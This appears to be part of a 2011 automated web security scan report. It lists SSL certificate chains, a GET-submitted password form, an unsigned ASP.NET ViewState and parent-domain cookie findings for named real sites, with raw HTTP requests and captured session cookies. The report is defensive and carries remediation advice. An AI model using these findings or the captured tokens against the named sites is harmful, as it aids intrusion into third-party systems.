Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

9.2. https://myshopify.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://myshopify.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  *.myshopify.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon May 10 16:23:08 GMT-06:00 2010
Valid to:  Wed Aug 12 13:17:14 GMT-06:00 2015

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

9.3. https://support.bigcommerce.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://support.bigcommerce.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  *.bigcommerce.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon Dec 07 18:00:00 GMT-06:00 2009
Valid to:  Tue Dec 11 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:  Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:  Sat Jul 26 12:15:15 GMT-06:00 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

9.4. https://www.bigcommerce.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.bigcommerce.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  *.bigcommerce.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon Dec 07 18:00:00 GMT-06:00 2009
Valid to:  Tue Dec 11 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:  Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:  Sat Jul 26 12:15:15 GMT-06:00 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

9.5. https://bugzilla.mozilla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.mozilla.org
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Nov 30 21:42:54 GMT-06:00 2009
Valid to:  Fri Dec 02 04:55:27 GMT-06:00 2011

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

9.6. https://cms.paypal.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cms.paypal.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.paypal.com,ST=California
Issued by:  Akamai Subordinate CA 3
Valid from:  Fri Apr 08 12:05:24 GMT-06:00 2011
Valid to:  Sun Apr 08 12:05:24 GMT-06:00 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 09:32:00 GMT-06:00 2006
Valid to:  Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

9.7. https://deloitte.zettaneer.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://deloitte.zettaneer.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.zettaneer.com
Issued by:  Network Solutions Certificate Authority
Valid from:  Wed May 11 18:00:00 GMT-06:00 2011
Valid to:  Fri May 29 17:59:59 GMT-06:00 2015

Certificate chain #1

Issued to:  Network Solutions Certificate Authority
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Apr 09 18:00:00 GMT-06:00 2006
Valid to:  Sat May 30 04:48:38 GMT-06:00 2020

Certificate chain #2

Issued to:  UTN-USERFirst-Hardware
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 02:09:10 GMT-06:00 2005
Valid to:  Sat May 30 04:48:38 GMT-06:00 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 04:48:38 GMT-06:00 2000
Valid to:  Sat May 30 04:48:38 GMT-06:00 2020

9.8. https://dne.oracle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://dne.oracle.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.oracle.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Wed Mar 30 18:00:00 GMT-06:00 2011
Valid to:  Tue Jul 31 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

9.9. https://docs.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://docs.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.google.com
Issued by:  Google Internet Authority
Valid from:  Thu Aug 11 21:49:02 GMT-06:00 2011
Valid to:  Sat Aug 11 21:59:02 GMT-06:00 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:  Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

9.10. https://education.oracle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://education.oracle.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.oracle.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Wed Mar 30 18:00:00 GMT-06:00 2011
Valid to:  Tue Jul 31 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

9.11. https://event.on24.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://event.on24.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.on24.com
Issued by:  Network Solutions Certificate Authority
Valid from:  Tue Oct 07 18:00:00 GMT-06:00 2008
Valid to:  Thu Oct 18 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  Network Solutions Certificate Authority
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Apr 09 18:00:00 GMT-06:00 2006
Valid to:  Sat May 30 04:48:38 GMT-06:00 2020

Certificate chain #2

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 12:10:42 GMT-06:00 1999
Valid to:  Tue Jul 09 12:19:22 GMT-06:00 2019

9.12. https://forms.netsuite.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forms.netsuite.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.netsuite.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Jan 07 17:22:23 GMT-06:00 2010
Valid to:  Mon Jan 07 17:22:23 GMT-06:00 2013

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 GMT-06:00 2006
Valid to:  Sun Nov 15 19:54:37 GMT-06:00 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 11:06:20 GMT-06:00 2004
Valid to:  Thu Jun 29 11:06:20 GMT-06:00 2034

9.13. https://forums.oracle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forums.oracle.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.oracle.com,ST=CALIFORNIA
Issued by:  Akamai Subordinate CA 3
Valid from:  Fri Apr 22 13:47:51 GMT-06:00 2011
Valid to:  Sun Apr 22 13:47:51 GMT-06:00 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 09:32:00 GMT-06:00 2006
Valid to:  Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

9.14. https://login.cnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  login.cnbc.com
Issued by:  Trusted Secure Certificate Authority
Valid from:  Sun Sep 27 18:00:00 GMT-06:00 2009
Valid to:  Wed Sep 28 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  Trusted Secure Certificate Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Thu Jun 28 12:14:35 GMT-06:00 2007
Valid to:  Sun Oct 28 12:44:35 GMT-06:00 2012

Certificate chain #2

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

9.15. https://login.oracle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  login.oracle.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Mon Mar 21 18:00:00 GMT-06:00 2011
Valid to:  Wed Jun 20 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

9.16. https://myprofile.oracle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.oracle.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Wed Mar 30 18:00:00 GMT-06:00 2011
Valid to:  Tue Jul 31 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

9.17. https://oracleus.wingateweb.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://oracleus.wingateweb.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.wingateweb.com
Issued by:  Entrust Certification Authority - L1C
Valid from:  Fri Apr 16 13:57:30 GMT-06:00 2010
Valid to:  Tue Apr 16 14:27:27 GMT-06:00 2013

Certificate chain #1

Issued to:  Entrust Certification Authority - L1C
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Thu Dec 10 14:43:54 GMT-06:00 2009
Valid to:  Tue Dec 10 15:13:54 GMT-06:00 2019

Certificate chain #2

Issued to:  Entrust.net Certification Authority (2048)
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Fri Dec 24 11:50:51 GMT-06:00 1999
Valid to:  Tue Jul 24 08:15:12 GMT-06:00 2029

9.18. https://register.cnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  register.cnbc.com
Issued by:  Trusted Secure Certificate Authority
Valid from:  Sun Sep 27 18:00:00 GMT-06:00 2009
Valid to:  Wed Sep 28 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  Trusted Secure Certificate Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Thu Jun 28 12:14:35 GMT-06:00 2007
Valid to:  Sun Oct 28 12:44:35 GMT-06:00 2012

Certificate chain #2

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

9.19. https://shop.oracle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.oracle.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.oracle.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Wed Mar 30 18:00:00 GMT-06:00 2011
Valid to:  Tue Jul 31 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

9.20. https://support.oracle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.oracle.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.oracle.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Wed Mar 30 18:00:00 GMT-06:00 2011
Valid to:  Tue Jul 31 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

9.21. https://www.atg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.atg.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.atg.com,ST=MASSACHUSETTS
Issued by:  Akamai Subordinate CA 3
Valid from:  Tue Jul 19 07:43:47 GMT-06:00 2011
Valid to:  Thu Jul 19 07:43:47 GMT-06:00 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 09:32:00 GMT-06:00 2006
Valid to:  Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

9.22. https://www.cvs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cvs.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.cvs.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Oct 13 18:00:00 GMT-06:00 2010
Valid to:  Fri Oct 28 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

10. Password field submitted using GET method

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=23877 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8467

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

11. ASP.NET ViewState without MAC enabled

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /default.aspx

Issue description

The ViewState is a mechanism built into the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

Request

GET /default.aspx?pid=mk HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Subsidiary=US; TLTHID=DFDB2FDD45BA94FC283A74BD7C3CBF64; TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:45:46 GMT
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: Subsidiary=US; path=/
Set-Cookie: PreviousMoniker=; path=/
Set-Cookie: Moniker=; path=/
Set-Cookie: ConsultantContactID=-9223372036854775808; path=/
Set-Cookie: TLTHID=A79DE10345855E54FDA05590CB54614B; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Vary: Accept-Encoding
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/
Content-Length: 36830


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN" >
<html>
<head><meta name="title" content="Mary Kay... Find your way to beautiful!" /><link id="Link1" rel="image_src" href="http://w
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzMzMDY3ODE4ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUXaWJDbG9zZUJyb3dzZXJEZXRlY3Rpb24=" />
...[SNIP]...

12. Cookie scoped to parent domain
There are 109 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

12.1. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/statuses/user_timeline.json HTTP/1.1
Host: api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 401 Unauthorized
Date: Tue, 06 Sep 2011 17:05:58 GMT
Server: hi
Status: 401 Unauthorized
WWW-Authenticate: OAuth realm="http://api.twitter.com"
X-Transaction: 1315328758-6109-39893
X-RateLimit-Limit: 150
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 06 Sep 2011 17:05:58 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.00626
Content-Type: application/json; charset=utf-8
Content-Length: 94
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 7b997ce2b49ff6792faaf34e1fe6d8827fe21243
X-RateLimit-Reset: 1315332358
Set-Cookie: guest_id=v1%3A131532875890927681; domain=.twitter.com; path=/; expires=Fri, 06 Sep 2013 05:05:58 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH00Xj8yAToHaWQiJTUyNTA5ZjQ3YzU2NjU3%250ANDczMjkwZTE4ZjM0ODEyNmJjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--356f1bbdd959d20fe46289e9da9efb4258cc6a16; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close

{"error":"This method requires authentication.","request":"\/1\/statuses\/user_timeline.json"}

12.2. http://convctr.overture.com/images/cc/cc.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://convctr.overture.com
Path:   /images/cc/cc.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cc/cc.gif?ver=1.0&aID=9684550200&mkt=0&ref=http%3A//www.rayalab.com/%3Fgclid%3DCMuoq_OIiasCFRligwodfwxd4w HTTP/1.1
Host: convctr.overture.com
Proxy-Connection: keep-alive
Referer: http://www.rayalab.com/free_sample.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxMLAycAc8BMqgw=

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:44 GMT
